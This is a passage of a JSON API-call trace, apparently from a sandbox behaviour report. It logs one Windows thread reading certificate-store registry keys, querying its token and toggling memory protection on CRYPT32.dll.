"\\xd8\\xf0[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00k!\\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v1\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\xf4\\xf0[\\x05\\x00\\xf2[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f'sp\\xf1[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f's\\xc0\\xf1[\\x05#!\\xd6\\xfa\\xa4\\xec[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xff\\xbc\\xf1[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\xfc\\xf1[\\x054\\xf4\\x1c\\xf2\\xbc\\xf1\\xac\\xf1 \\xf2\\x00\\x00<\\xff\\x00\\x004\\xf4[\\x05\\x1c\\xf2[\\x05 \\xf2[\\x05\\x00\\x00\\x00\\x00\\xd0\\xf1[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\xfc\\xf1[\\x05" + } + ], + "repeated": 0, + "id": 1431 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000534" + } + ], + "repeated": 0, + "id": 1432 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1433 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000534" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1434 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000534" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + } + ], + "repeated": 0, + "id": 1435 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1436 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x768135f9", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000534" + } + ], + "repeated": 0, + "id": 1437 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000534" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\" + } + ], + "repeated": 0, + "id": 1438 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000534" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1439 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1440 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1441 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000534" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1442 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000538" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1443 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000538" + } + ], + "repeated": 0, + "id": 1444 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000534" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1445 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1446 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000053c" + } + ], + "repeated": 0, + "id": 1447 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ba174", + "parentcaller": "0x768087e5", + "category": "process", + "api": "NtOpenProcessToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "DesiredAccess", + "value": "0x00000008" + }, + { + "name": "TokenHandle", + "value": "0x0000053c" + } + ], + "repeated": 0, + "id": 1448 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x76808ab9", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x90\\xf0[\\x05\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xa3 \\xd6\\xfat\\xa1ku\\x88\\x8f's\\xe5\\x87\\x80v0\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\\\x05\\x00\\x00\\x00\\x00\\xac\\xf0[\\x05\\xb8\\xf1[\\x05\\xa4\\xfd[\\x05\\x90c\\x1bst\\xa1ku\\x88\\x8f's(\\xf1[\\x05\\xdb\\x9e\\x06slS%s$\\xb6,s\\xbcA\\x83\\x02\\x88\\x8f'sx\\xf1[\\x05[!\\xd6\\xfa\\\\xec[\\x05\\x04\\xa0\\x04s\\xa4\\xfd[\\x05\\x90c\\x1bs\\xdf!\\xab\\x8c\\xfe\\xff\\xff\\xfft\\xf1[\\x05\\xe6\\xb5\\x07s9\\x00\\x00\\x00\\xbc\\x9a%s\\xdc\\xb5%s\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd7\\xb5%s\\x9c\\xb3%s\\xff\\xff\\xff\\xff0~%s\\x08\\x00\\x00\\x00\\xc8\\xb5%s\\xb4\\xf1[\\x05\\xf4\\xf3\\xd4\\xf1t\\xf1d\\xf1\\xd8\\xf1\\x00\\x00<\\xff\\x00\\x00\\xf4\\xf3[\\x05\\xd4\\xf1[\\x05\\xd8\\xf1[\\x05\\x00\\x00\\x00\\x00\\x88\\xf1[\\x05t\\xa1ku\\xff\\xff\\xff\\xff\\x08\\x00\\x00\\x00\\xb4\\xf1[\\x05" + } + ], + "repeated": 0, + "id": 1449 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756b8b4a", + "parentcaller": "0x7680880c", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000053c" + } + ], + "repeated": 0, + "id": 1450 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1451 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "DesiredAccess", + "value": "0x02000000", + "pretty_value": "MAXIMUM_ALLOWED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x000002ac" + }, + { + "name": "ObjectAttributesName", + "value": "S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 1452 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1453 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x768b4000" + }, + { + "name": "ModuleName", + "value": "CRYPT32.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1454 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + } + ], + "repeated": 0, + "id": 1455 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0055a000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1456 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Certificates" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots\\Certificates" + } + ], + "repeated": 0, + "id": 1457 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "ValueName", + "value": "Certificates" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x18\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xd0U\\xcb\\xf4\\x0e~\\xdb\\x01\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00" + }, + { + "name": "FullName", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots\\Certificates" + } + ], + "repeated": 0, + "id": 1458 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x768138b2", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000540" + } + ], + "repeated": 0, + "id": 1459 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x768136be", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000053c" + } + ], + "repeated": 0, + "id": 1460 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1461 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fbb51", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1462 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1463 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Root\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1464 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1465 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1466 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000530" + } + ], + "repeated": 0, + "id": 1467 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1468 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots" + } + ], + "repeated": 0, + "id": 1469 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7680eba3", + "parentcaller": "0x767fabfb", + "category": "misc", + "api": "NtQuerySystemInformation", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SystemInformationClass", + "value": "103" + } + ], + "repeated": 1, + "id": 1470 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1471 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000530" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\Root" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1472 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000530" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\" + } + ], + "repeated": 0, + "id": 1473 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\ROOT\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1474 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "KeyInformation", + "value": "\\xffa0\\xfff9q%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1475 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000053c" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 1476 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000540" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000053c" + }, + { + "name": "ObjectAttributesName", + "value": "0119E81BE9A14CD8E22F40AC118C687ECBA3F4D8" + }, + { + "name": "ObjectAttributes", + "value": 